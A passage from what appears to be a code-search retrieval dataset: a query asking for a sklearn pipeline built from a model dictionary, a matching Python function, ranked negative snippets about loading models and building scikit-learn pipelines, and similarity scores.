NameError:\n try:\n model = get_model_from_yaml(name)\n logger.info(\"Model {n} loaded from yaml\".format(n=name))\n except KeyError:\n try:\n from .model_defs import parse_model_name\n model = parse_model_name(name)\n logger.info(\"Model {n} parsed from name\".format(n=name))\n except NameError:\n sys.exit(\"Unknown model {n}\".format(n=name))\n\n if not hasattr(model, 'name'):\n model.name = name\n\n return model", "def get_model(self):\n return self.chain.model", "def get(self) -> CrosswalkModel | None:\n self._refresh_model_terms()\n return self.model", "def get_model(name, disable_logging=False):\n return PluginLoader._import(\"train.model\", name, disable_logging)", "def find(model: str, title: str = None, alias: str = None, language: str = None) -> odm.SingleModelFinder:\n f = taxonomy.find(model.format(model), language)\n\n if title:\n f.regex('title', '^{}$'.format(title), True)\n\n if alias:\n f.eq('alias', alias)\n\n return f", "def build_model():", "def get_model(self, app_label, model_name,\n seed_cache=True, only_installed=True):\n if seed_cache:\n self._populate()\n if only_installed and app_label not in self.app_labels:\n return None\n return self.app_models \\\n .get(app_label, SortedDict()) \\\n .get(model_name.lower())", "def model(self):\n return self._model", "def model(self):\n return self._model", "def model(self):\n return self._model", "def model(self):\n return self._model", "def model(self):\n return self._model", "def model_lookup(model_zoo: ModelZoo,\n label_set: LabelSetName,\n model_name: ModelName,\n frozen: bool) -> Model:\n for model in model_zoo.models:\n if model.label_set == label_set and model.model_name == model_name and model.frozen == frozen:\n return model\n else:\n return None", "def _default_make_sa_model(model):\n name = model._meta.object_name + \".__aldjemy__\"\n return type(name, (), {\"__module__\": model.__module__})", "def abstract_get(self, model, id=False):\n return self.env[model].sudo().browse(id) if id else self.env[model].search([])", "def get_model(self, model_id):\n if self.model_dict.has_key(model_id):\n return self.model_dict[model_id]\n return None", "def __getitem__(self, key):\n return self.get_models()[str(key)]", "def load_model(self):\n pass", "def find_model(config, obj, mods):\n for mod in mods:\n if mod[0] != config:\n continue\n\n if len(mod) == 2:\n return mod[1]\n\n if len(mod) == 3 and mod[1] in obj:\n return mod[2]\n\n return None", "def find_model(config, obj, mods):\n for mod in mods:\n if mod[0] != config:\n continue\n\n if len(mod) == 2:\n return mod[1]\n\n if len(mod) == 3 and mod[1] in obj:\n return mod[2]\n\n return None", "def _get_model(self) -> str:\n return str(self.hass.data[DOMAIN][self._config_entry.entry_id][ATTR_MODEL])", "def gen_model():\n\n\tmodel = skipthoughts.load_model()\n\treturn model", "def _get_model():\n with open('models/catapp_gp_model.pickle', 'rb') as modelfile:\n model = pickle.load(modelfile)\n return model", "def create_model(self):\n model = solph.Model(self.es)\n return model", "def getModel(self, *args):\n return _libsbml.SBMLValidator_getModel(self, *args)", "def search(self):\r\n return resource.Search(self)", "def get_model(self, full_name: Union[Type[Model], str], reference_model: Type[Model]):\n\n if isinstance(full_name, str):\n name_parts = full_name.split(\".\")\n if len(name_parts) == 1:\n return self.get_app_model(reference_model._meta.app_label, full_name)\n\n elif len(name_parts) == 2:\n return self.get_app_model(*name_parts)\n\n else:\n raise ConfigurationError('Model name needs to be in format \"app.Model\" or \"Model\"')\n\n elif inspect.isclass(full_name) and issubclass(full_name, Model):\n return full_name\n\n else:\n raise TypeError(f\"Cannot get model from {full_name}. Invalid type.\")", "def _get_model_from_table_name(table_name: str) -> Optional[Type[RDSModel]]:\n table_model = None\n try:\n if hasattr(Base, '_decl_class_registry'):\n models = Base._decl_class_registry.values() # sqlalchemy < 1.4\n else:\n models = Base.registry._class_registry.values()\n\n for model in models:\n if hasattr(model, '__tablename__') and model.__tablename__ == table_name:\n table_model = model\n except Exception as e:\n LOGGER.exception(f'Failed to get model for the table: {table_name} from rds model base')\n raise e\n\n return table_model", "def get_default_model():\n models = PluginLoader.get_available_models()\n return 'original' if 'original' in models else models[0]", "def get_model(self):\n url = self.resource()\n params = {'data': ''}\n resp = self._client.get(url, params=params)\n\n return resp.text", "def get_model_obj(self):\n if hasattr(self, 'model_obj'): return self.model_obj\n model_ct = ContentType.objects.get(\n app_label=self.kwargs.get('app_label'), model=self.kwargs.get('model'))\n self.model_obj = model_ct.model_class()\n return self.model_obj", "def get_model(word_to_idx, label_to_idx, resume=False, use_glove=True):\n\n best_acc = 0 # best test accuracy\n start_epoch = 0 # start from epoch 0 or last checkpoint epoch\n\n if resume:\n # load checkpoint\n checkpoint = load_checkpoint()\n model = checkpoint['model']\n best_acc = checkpoint['acc']\n start_epoch = checkpoint['epoch']\n else:\n print('==> Building model {}...'.format(cfg.RUN_MODE))\n if cfg.RUN_MODE in [\"RNN\", \"LSTM\", \"GRU\"]:\n model = BatchRNN(cfg.EMBEDDING_DIM, cfg.HIDDEN_DIM, cfg.BATCH_SIZE,\n len(word_to_idx), len(label_to_idx), rnn_model=cfg.RUN_MODE)\n else:\n model = CNN_NLP(cfg.EMBEDDING_DIM, cfg.HIDDEN_DIM, cfg.BATCH_SIZE,\n len(word_to_idx), len(label_to_idx))\n if use_glove:\n # model.load_glove_model('GloVe-1.2/vectors.txt', word_to_idx)\n model.load_glove_model(cfg.GLOVE_FILE, word_to_idx, regenerate=True)\n return model, best_acc, start_epoch", "def _search_model_extractor(self, repo_url):\n # Find model folder\n # The model name is the name of the author of the repository\n model_name = 'snippet_model_%s' % repo_url.split('/')[-2]\n # It is stored in the models_data folder\n models_data = Path(pkg_resources.resource_filename('credentialdigger',\n 'models_data'))\n dev_model = models_data / model_name\n\n # Find extractor binary\n # Get name and version from the metafile\n with open(dev_model / 'meta.json', 'r') as f:\n meta = json.loads(f.read())\n inner_folder = dev_model / ('%s-%s' % (meta['name'], meta['version']))\n # There should be only one binary in the inner folder\n extractor_file = list(inner_folder.glob('**/*.bin'))[0]\n\n return dev_model.name, extractor_file.name", "def model(self) -> Model:\n return self._model", "def _get_model(model_identifier):\n registry = Base._decl_class_registry\n Model = registry.get(model_identifier, None)\n if Model is None:\n raise base.DeserializationError(u\"Invalid model identifier: '%s'\" \\\n % model_identifier)\n return Model" ]
[ "0.72097623", "0.6948634", "0.67616165", "0.67475533", "0.66909075", "0.66902417", "0.66678", "0.6573517", "0.65641904", "0.65121186", "0.651177", "0.6477959", "0.6459214", "0.6455929", "0.64499646", "0.6413741", "0.6407674", "0.64009804", "0.6380913", "0.6357358", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.63377213", "0.6314476", "0.630511", "0.6297346", "0.62917036", "0.62709826", "0.6261574", "0.6255416", "0.62477183", "0.6209037", "0.62045234", "0.6197182", "0.61875147", "0.6180646", "0.61802095", "0.6168577", "0.61603415", "0.6150952", "0.6148835", "0.6148835", "0.6148835", "0.6148835", "0.6148835", "0.61481947", "0.6120006", "0.6114671", "0.61094385", "0.609875", "0.6090517", "0.6066811", "0.6062011", "0.60562944", "0.60549396", "0.605192", "0.60493225", "0.60493225", "0.60459554", "0.60358566", "0.60357106", "0.60355043", "0.60266215", "0.60234725", "0.60228366", "0.60025465", "0.60025465", "0.60025465", "0.60025465", "0.60025465", "0.5994615", "0.5977134", "0.5945629", "0.5937925", "0.5926864", "0.591723", "0.5902715", "0.5902715", "0.5900628", "0.5894314", "0.5891494", "0.5889242", "0.58860976", "0.5877046", "0.58626276", "0.586035", "0.5850018", "0.58465767", "0.5840562", "0.58360696", "0.5831525", "0.58276325", "0.58119667" ]
0.6980467
1
Return a sklearn model pipeline from a model_dict
def get_model_from_dict(model_dict): pipe_list = [] if 'transforms' in model_dict: # For basic scikit-learn transforms transforms = model_dict['transforms'].copy() if 'scaler' in transforms: scaler = transforms.pop('scaler') pipe_list.append(get_scaler(scaler)) if 'pca' in transforms: transforms.pop('pca') pipe_list.append(get_pca()) if 'poly' in transforms: args = transforms.pop('poly') pipe_list.append(get_poly(args)) if len(transforms) > 0: raise Exception("unknown transforms: %s" % repr(transforms)) if 'args' in model_dict: model = get_model_class(model_dict['class'], model_dict['args']) else: model = get_model_class(model_dict['class']) if 'clusterregression' in model_dict: from empirical_lsm.clusterregression import ModelByCluster clusterer = model_dict['clusterregression']['class'] cluster_args = model_dict['clusterregression']['args'] model = ModelByCluster( get_clusterer(clusterer, cluster_args), model) pipe_list.append(model) pipe = make_pipeline(*pipe_list) if 'lag' in model_dict: params = model_dict['lag'] pipe = get_lagger(pipe, params) elif 'markov' in model_dict: params = model_dict['markov'] pipe = get_markov_wrapper(pipe, params) if 'forcing_vars' in model_dict: pipe.forcing_vars = model_dict['forcing_vars'] else: logger.warning("Warning: no forcing vars, using defaults (all)") pipe.forcing_vars = get_config(['vars', 'met']) if 'description' in model_dict: pipe.description = model_dict['description'] return pipe
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_pipeline(model):\n\n steps = [\n (\"imp\", SimpleImputer(strategy=\"most_frequent\")),\n (\"norm\", MinMaxScaler()),\n (\"reg\", model)\n ]\n pipeline = Pipeline(steps=steps)\n\n return pipeline", "def build_model():\n # Build ML pipeline using random forest classifier\n model = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier(\n n_estimators=100, min_samples_split=2)))\n ])\n\n return model", "def build_model():\n # Build ML pipeline using random forest classifier\n model = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier(\n n_estimators=100, min_samples_split=2)))\n ])\n\n return model", "def build_model():\n pipeline = Pipeline([\n ('vectorizer', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n # (), # Feature engineering (word2vec/GloVe)\n (\"clf\", MultiOutputClassifier(RandomForestClassifier(n_estimators=100), n_jobs=-1))\n ])\n\n return pipeline", "def make_full_pipeline(\n preprocess_pipe: ColumnTransformer, model: BaseEstimator\n) -> Pipeline:\n full_pipe = sklearn.pipeline.Pipeline(\n [(\"preprocess\", preprocess_pipe), (\"model\", model)]\n )\n return full_pipe", "def build_model():\n pipeline = Pipeline([\n ('features', FeatureUnion([\n\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n ('starting_verb', StartingVerbExtractor())\n ])),\n ('clf', DecisionTreeClassifier())\n ])\n\n parameters = [\n {\n 'features__text_pipeline__vect__max_df': (0.5, 1.0),\n 'features__text_pipeline__vect__min_df': (1, 0.01),\n 'features__text_pipeline__vect__max_features': (None, 5000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf': (DecisionTreeClassifier(min_samples_split=3),),\n 'clf__max_depth': (None, 4)\n }, {\n 'features__text_pipeline__vect__max_df': (0.5, 1.0),\n 'features__text_pipeline__vect__min_df': (1, 0.01),\n 'features__text_pipeline__vect__max_features': (None, 5000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf': (MultiOutputClassifier(LinearSVC(multi_class='ovr')),)\n }, {\n 'features__text_pipeline__vect__max_df': (0.5, 1.0),\n 'features__text_pipeline__vect__min_df': (1, 0.01),\n 'features__text_pipeline__vect__max_features': (None, 5000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf': (MLPClassifier(),),\n 'clf__hidden_layer_sizes': ((100, 10), (50,), (50, 10))\n }\n ]\n\n cv = GridSearchCV(pipeline, parameters, cv=3, n_jobs=4, verbose=10)\n \n return cv", "def build_model():\n pipeline = Pipeline([('cvect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(LinearSVC(multi_class=\"crammer_singer\"), n_jobs=1))\n ])\n\n parameters = {\n 'clf__estimator__C': 1,\n 'clf__estimator__max_iter': 1000 }\n \n model = GridSearchCV(pipeline, param_grid=parameters)\n\n\n return model", "def build_model():\n pipeline = Pipeline(\n [\n (\"vect\", CountVectorizer(tokenizer=tokenize)),\n (\"tfidf\", TfidfTransformer()),\n (\"clf\", MultiOutputClassifier(LinearSVC(dual=False))),\n ]\n )\n\n # use grid search to optimize the pipeline parameters\n parameters = {\"tfidf__use_idf\": (True, False), \"clf__estimator__C\": [1, 100]}\n cv = GridSearchCV(pipeline, param_grid=parameters)\n\n return cv", "def build_model():\n nltk.download(['punkt', 'wordnet', 'averaged_perceptron_tagger', 'stopwords'])\n pipeline = Pipeline([\n ('features', FeatureUnion([\n \n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer()),\n ('tfidf', TfidfTransformer())\n ])),\n \n ('strarting_verb', StartingVerbExtractor())\n \n ])),\n\n ('clf', MultiOutputClassifier(estimator = AdaBoostClassifier(random_state = 42)))\n\n ])\n \n parameters = {\"clf__estimator__learning_rate\": [0.1, 0.5, 1.0],\n \"clf__estimator__n_estimators\": [25, 50, 75]\n }\n \n from sklearn.model_selection import GridSearchCV\n cv = GridSearchCV(pipeline, param_grid = parameters) \n \n return cv", "def build_model():\n \n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize, max_df = 0.75, max_features = 5000, ngram_range = (1, 2))),\n ('tfidf', TfidfTransformer(use_idf = True)),\n ('clf', MultiOutputClassifier(estimator=RandomForestClassifier(n_estimators = 200, min_samples_split = 2)))\n ])\n \n return pipeline", "def build_model():\n \n pipeline = Pipeline([\n ('features', FeatureUnion([\n\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n\n ('starting_verb', StartingVerbExtractor())\n ])),\n\n ('clf', MultiOutputClassifier(AdaBoostClassifier()))\n])\n \n # specify parameters for grid search\n parameters = {\n 'features__text_pipeline__vect__ngram_range': ((1, 1), (1, 2)),\n 'features__text_pipeline__vect__max_df': (0.75, 1.0)\n }\n\n # create grid search object\n cv = GridSearchCV(pipeline, param_grid = parameters, n_jobs= 8, cv = 3, verbose = 2)\n\n return cv", "def create_pipeline(clf):\n return Pipeline([('scaler', MinMaxScaler()), ('clf', clf)])", "def model_pipeline(catnums):\n pipe = make_pipeline(\n Imputer(strategy='most_frequent'),\n OneHotEncoder(categorical_features=catnums, sparse=False),\n PolynomialFeatures(),\n Ridge(alpha=25)\n )\n return pipe", "def build_model():\n pipeline = Pipeline([\n ('features', FeatureUnion([\n \n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n\n ('starting_verb', StartingVerbExtractor())\n ])),\n \n ('clf', MultiOutputClassifier(AdaBoostClassifier()))\n ])\n\n # specify parameters for grid search\n parameters = {\n 'clf__estimator__n_estimators': [50],\n 'clf__estimator__learning_rate': [1]\n }\n\n # create grid search object\n cv = GridSearchCV(pipeline, param_grid=parameters)\n \n return cv", "def build_model():\n #\n pipeline = Pipeline([\n ('features', FeatureUnion([\n ('text_pipeline', Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),('tfidf', TfidfTransformer())])),\n ('starting_verb', StartingVerbExtractor())])),\n ('clf', RandomForestClassifier())\n ])\n \n # hyerparameters for grid to search within\n# parameters = [{'clf__bootstrap': [False, True],\n# 'clf__bootstrap': [False, True],\n# 'clf__n_estimators': [80,90, 100, 110, 130],\n# 'clf__max_features': [0.6, 0.65, 0.7, 0.73, 0.7500000000000001, 0.78, 0.8],\n# 'clf__min_samples_leaf': [10, 12, 14],\n# 'clf__min_samples_split': [3, 5, 7]\n# }\n# ]\n\n parameters = {\n 'features__text_pipeline__vect__ngram_range': ((1, 1), (1, 2)),\n 'features__text_pipeline__vect__max_df': (0.5, 0.75, 1.0),\n 'features__text_pipeline__vect__max_features': (None, 5000, 10000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf__n_estimators': [50, 80, 90, 100, 200],\n 'clf__min_samples_split': [2, 3, 4, 5, 7],\n 'features__transformer_weights': (\n {'text_pipeline': 1, 'starting_verb': 0.5},\n {'text_pipeline': 0.5, 'starting_verb': 1},\n {'text_pipeline': 0.8, 'starting_verb': 1},\n )\n }\n\n\n # Final model ready to be applied on dataset\n model = GridSearchCV(pipeline, param_grid=parameters)\n \n return model", "def build_model(self):\n pipeline = Pipeline([\n ('vec', CountVectorizer(tokenizer=self.tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n self.model = pipeline\n return pipeline", "def model_fn(model_dir):\n model_path = Path(model_dir)/\"model.joblib\"\n clf = joblib.load(model_path)\n return clf", "def create_model(X, y, clf_info, permute):\n import numpy as np\n from sklearn.pipeline import Pipeline\n\n def to_instance(clf_info):\n mod = __import__(clf_info[0], fromlist=[clf_info[1]])\n params = {}\n if len(clf_info) > 2:\n params = clf_info[2]\n clf = getattr(mod, clf_info[1])(**params)\n if len(clf_info) == 4:\n from sklearn.model_selection import GridSearchCV\n\n clf = GridSearchCV(clf, param_grid=clf_info[3])\n return clf\n\n if isinstance(clf_info[0], list):\n # Process as a pipeline constructor\n steps = []\n for val in clf_info:\n step = to_instance(val)\n steps.append((val[1], step))\n pipe = Pipeline(steps)\n else:\n clf = to_instance(clf_info)\n from sklearn.preprocessing import StandardScaler\n\n pipe = Pipeline([(\"std\", StandardScaler()), (clf_info[1], clf)])\n\n y = y.ravel()\n if permute:\n pipe.fit(X, y[np.random.permutation(range(len(y)))])\n else:\n pipe.fit(X, y)\n predicted = pipe.predict(X)\n return (y, predicted), pipe", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {'clf__estimator__n_estimators': [50, 100],\n 'clf__estimator__min_samples_split': [2, 3, 5],\n 'clf__estimator__criterion': ['entropy', 'gini']\n }\n \n cv = GridSearchCV(pipeline, param_grid=parameters)\n \n return cv", "def build_model():\n # build pipeline with count vecotrizer, tfidf and support vector machine\n pipeline_SVC = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('multi-clf', MultiOutputClassifier(LinearSVC()))\n ])\n\n # define parameters for gridsearch\n parameters_SVC = {\n 'vect__max_df': (.6, 1),\n 'tfidf__norm': ('l1', 'l2'),\n 'multi-clf__estimator__C': (.1, 1, 100)\n }\n\n # build parameter grid and fit data\n model = GridSearchCV(pipeline_SVC, parameters_SVC)\n\n return model", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize, min_df = 5)),\n ('tfidf', TfidfTransformer(use_idf = True)),\n ('clf', MultiOutputClassifier(RandomForestClassifier(n_estimators = 10,\n min_samples_split = 10)))\n ])\n\n # Create parameters dictionary\n parameters = {'vect__min_df': [1, 5],\n 'tfidf__use_idf':[True, False],\n 'clf__estimator__n_estimators':[10, 25],\n 'clf__estimator__min_samples_split':[2, 5, 10]}\n\n # create grid search\n cv = GridSearchCV(pipeline, param_grid=parameters)\n\n return cv", "def build_model(search = False):\n\n logging.info(\"run build_model\")\n\n # pipeline definition\n pipeline = Pipeline([\n ('tokenize', TokenizeTransform()), # split text into lemmatized words\n ('tfidf_emb', TfidfEmbeddingVectorizer()),\n ('clf', MultiOutputClassifier(GradientBoostingClassifier()))\n ], verbose=True)\n\n # set pipeline parameters\n pipeline.set_params(**{\n 'tfidf_emb__size':300,\n 'tfidf_emb__iter':200,\n 'tfidf_emb__min_count': 3,\n\n 'clf__estimator__max_depth': 10,\n 'clf__estimator__n_estimators':50,\n 'clf__estimator__min_samples_split':4,\n 'clf__estimator__random_state':0,\n 'clf__estimator__random_state': 0,\n })\n\n if search == True:\n parameters = {\n 'tfidf_emb__size': (200, 300),\n 'tfidf_emb__iter': (100, 200),\n 'tfidf_emb__min_count': (3, 5),\n\n 'clf__estimator__max_depth': (10,13),\n 'clf__estimator__n_estimators': (20, 30),\n 'clf__estimator__min_samples_split': (2,4),\n }\n\n pipeline = GridSearchCV(pipeline, parameters)\n\n return pipeline", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(LogisticRegression(random_state=2020), n_jobs=-1))\n ])\n\n parameters = {\n 'clf__estimator__C': [1, 2, 4],\n 'clf__estimator__penalty': ['l1', 'l2']\n }\n\n cv = GridSearchCV(pipeline, param_grid=parameters, cv=5)\n\n return cv", "def build(X, y=None):\n model = Pipeline([\n ('preprocessor',NLTKPreprocessor()),\n ('vectorizer', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', OneVsRestClassifier(LinearSVC(C=0.9)))])\n\n model.fit(X, y)\n return model", "def build_model():\n # Pipeline of CountVextorizer, TfdifTransformer and MultiOutputClassifier\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {'clf__estimator__n_estimators': [50, 30],\n 'clf__estimator__min_samples_split': [3, 2] \n }\n \n cv = GridSearchCV(pipeline, param_grid= parameters, verbose=2, n_jobs=4)\n return cv", "def build_model():\n \n #english trained optimized pipeline for word embedding\n nlp = spacy.load(\"en_core_web_md\") # this model will give you 300D\n \n pipeline = Pipeline([\n ('features', FeatureUnion([\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ])),\n \n ('embeddings_pipeline', Pipeline([\n ('vect_trans',SpacyVectorTransformer(nlp)),\n ('reduce_dim', TruncatedSVD(50)),\n ])),\n \n ])),\n \n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {\n 'features__text_pipeline__vect__max_df': (0.5, 0.75, 1.0),\n 'features__embeddings_pipeline__reduce_dim__n_components':(50,60,70,100,120,130,150)\n }\n cv = GridSearchCV(pipeline, param_grid=parameters,cv=2)\n \n return cv", "def build_model():\n\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(DecisionTreeClassifier()))\n ])\n\n \n parameters = {'clf__estimator__min_samples_split':[2, 4, 6],\n 'clf__estimator__max_depth': [2, 4]}\n\n #parameters = {'clf__estimator__min_samples_split':[2]}\n cv = GridSearchCV(pipeline, parameters)\n\n return(cv)", "def train_model(\r\n train_x: pd.DataFrame,\r\n train_y: pd.DataFrame,\r\n parameters: Dict[str, Any]\r\n) -> sklearn_Pipeline:\r\n # Build a multi-class logistic regression model\r\n model_params = parameters['model_params']\r\n model = LogisticRegression(**model_params)\r\n\r\n if parameters['model_standard_scaler']:\r\n # Prepare column transformer to do scaling\r\n col_transformer = ColumnTransformer(\r\n [\r\n (\r\n 'standard_scaler',\r\n StandardScaler(copy=False),\r\n [\r\n \"sepal_length\",\r\n \"sepal_width\",\r\n \"petal_length\",\r\n \"petal_width\",\r\n ],\r\n ),\r\n ],\r\n remainder='drop',\r\n )\r\n\r\n # Make pipeline w/ scaler\r\n model_pipeline = sklearn_Pipeline(\r\n steps=[\r\n ('col_transformer', col_transformer),\r\n ('model', model),\r\n ]\r\n )\r\n else:\r\n # Make pipeline w/o scaler\r\n model_pipeline = sklearn_Pipeline(\r\n steps=[\r\n ('model', model),\r\n ]\r\n )\r\n\r\n # Fit\r\n model_pipeline.fit(train_x, train_y)\r\n\r\n mlflow.set_experiment('iris-example')\r\n mlflow_sklearn.log_model(sk_model=model_pipeline, artifact_path=\"model\")\r\n mlflow.log_params(model_params)\r\n\r\n # Print out the model pipeline\r\n # See: http://www.xavierdupre.fr/app/mlinsights/helpsphinx/notebooks/visualize_pipeline.html\r\n dot = pipeline2dot(model_pipeline, train_x)\r\n dot_filename = 'pipeline_dot.dot'\r\n with open(dot_filename, 'w', encoding='utf-8') as f:\r\n f.write(dot)\r\n if sys.platform.startswith(\"win\") and \"Graphviz\" not in os.environ[\"PATH\"]:\r\n os.environ['PATH'] = os.environ['PATH'] + r';C:\\Program Files (x86)\\Graphviz2.38\\bin'\r\n cmd = \"dot -G=300 -Tpng {0} -o{0}.png\".format(dot_filename)\r\n run_cmd(cmd, wait=True, fLOG=print)\r\n mlflow.log_artifact('{0}.png'.format(dot_filename), 'model')\r\n\r\n return model_pipeline", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(AdaBoostClassifier()))\n ])\n\n parameters = {\n 'vect__stop_words': ['english',None],\n 'tfidf__smooth_idf': [True, False],\n 'tfidf__norm': ['l2','l1'],\n 'clf__estimator__learning_rate': [0.5, 1, 2],\n 'clf__estimator__n_estimators': [20, 60, 100]\n }\n\n clf_grid_model = RandomizedSearchCV(pipeline,\n parameters,\n cv=3,\n refit=True,\n verbose=10,\n n_jobs=-1)\n return clf_grid_model", "def from_dict(cls, dikt) -> 'PipelineDefinition':\n return util.deserialize_model(dikt, cls)", "def build_svm_pipeline():\n svm_pipeline = None\n\n svm_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', SGDClassifier()),\n ])\n\n return svm_pipeline", "def load_model(model=\"stroke_prediction.joblib\"):\n\n clf = joblib.load(model)\n return clf", "def build_model(self) -> Pipeline:\r\n clf = RandomForestClassifier(\r\n n_estimators=200,\r\n max_features='auto',\r\n min_samples_leaf=1,\r\n min_samples_split=3,\r\n random_state=42, \r\n n_jobs=-1)\r\n model = MultiOutputClassifier(clf)\r\n \r\n pipeline = Pipeline([\r\n ('features', FeatureUnion(\r\n [('text', Pipeline(\r\n [('text_field_extractor', \r\n basic_utils.TextFieldExtractor('message')), \r\n ('tfidf', \r\n TfidfVectorizer(tokenizer=basic_utils.tokenize, \r\n min_df=.0025, max_df=0.5, ngram_range=(1,2)))\r\n ])),\r\n ('numerics', FeatureUnion(\r\n [('text_len', \r\n Pipeline([('text_len_extractor', \r\n basic_utils.NumericFieldExtractor('text_len')), \r\n ('text_len_scaler', StandardScaler())\r\n ])),\r\n ('punt_perc', \r\n Pipeline([('punt_perc_extractor', \r\n basic_utils.NumericFieldExtractor('punt_perc')), \r\n ('punt_perc_scaler', StandardScaler())\r\n ]))\r\n ])),\r\n ('starting_verb', basic_utils.PosFieldExtractor('starting_verb_flag'))\r\n ])),\r\n ('clf', model)\r\n ])\r\n \r\n return pipeline", "def _predict_preproc_model(self, model_cfg, model,):\n model = self._make_model(model_cfg['model_name'], databunch=self._data)\n model.model_param = model_cfg['model_param']\n model.wrapper_params = model_cfg['wrapper_params']\n return(model)", "def build_model():\n \n pipelineRFC = Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))])\n \n param = {\n 'clf__estimator__n_estimators': [10, 50]\n }\n \n gscv = GridSearchCV(pipelineRFC, param_grid=param, verbose=15)\n return gscv", "def train_model_pipeline(conform_shape=True, indi_proportion=0.50, incl_group_imgs=True,\r\n feature_extractor=flatten_array, model=train_logistic_regression): \r\n # Create dataframe subject to feature extractor requirements\r\n X_train, y_train, X_test_indi, y_test_indi, X_test_group, y_test_group = \\\r\n create_train_test_sets(conform_shape=conform_shape, indi_proportion=indi_proportion, \r\n incl_group_imgs=incl_group_imgs)\r\n \r\n # Extract features\r\n if feature_extractor == extract_ORB_features:\r\n if os.path.isfile('Trained_Models/Kmeans_model.sav'):\r\n kmeans_model = load_model('Trained_Models/Kmeans_model.sav')\r\n else:\r\n kmeans_model = kmeans_cluster(X_train, 500)\r\n X_train = feature_extractor(X_train, kmeans_model, normalize = False)\r\n X_test_indi = feature_extractor(X_test_indi, kmeans_model, normalize = False)\r\n X_test_group = feature_extractor(X_test_group, kmeans_model, normalize = False)\r\n\r\n else:\r\n X_train = feature_extractor(X_train)\r\n X_test_indi = feature_extractor(X_test_indi)\r\n X_test_group = feature_extractor(X_test_group)\r\n \r\n # Train model on flattened array (no feature extraction)\r\n trained_model = model(X_train, y_train)\r\n \r\n indi_pred_class, indi_accuracy = evaluate_model(trained_model, X_test_indi, y_test_indi)\r\n group_pred_class, group_accuracy = evaluate_model(trained_model, X_test_group, y_test_group)\r\n \r\n return trained_model, indi_pred_class, indi_accuracy, group_pred_class, group_accuracy", "def _get_pipeline(self, params_dict):\n p = Pipeline(steps=[('normalise', StandardScaler()),\n ('add_noise', NoiseAdder()),\n ('dim_reduce', PCA()),\n ('cluster', KMeans())])\n p.set_params(**params_dict)\n return p", "def model_fn(model_dir):\n\n model = BertForSequenceClassification.from_pretrained('cl-tohoku/bert-base-japanese-whole-word-masking', \n num_labels=1)\n model = torch.nn.DataParallel(model)\n with open(os.path.join(model_dir, 'model.pth'), 'rb') as f:\n model.load_state_dict(torch.load(f))\n \n return {\"net\": model, \"tokenizer\": tokenizer}", "def build_model():\n \n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {\n 'vect__ngram_range': ((1, 1), (1, 2)),\n 'clf__estimator__min_samples_split': [2, 4],\n }\n \n cv = GridSearchCV(pipeline, param_grid=parameters)\n\n return cv", "def load_model(input_path):\n logger.info(\"Loading model from %s\" % input_path)\n return pyspark.ml.PipelineModel.load(input_path)", "def predict(\r\n model: sklearn_Pipeline, \r\n test_x: pd.DataFrame\r\n) -> pd.DataFrame:\r\n # Return predictions\r\n return model.predict(test_x)", "def build_own_pipeline() -> Pipeline:\n clf = svm.LinearSVC(C=2, loss='hinge')\n vect = TfidfVectorizer(ngram_range=(1, 2))\n\n pipeline = None\n ##### Write code here #######\n pipeline = Pipeline([\n ('vect', vect),\n ('tfidf', TfidfTransformer()),\n ('clf', clf)\n ])\n ##### End of your work ######\n 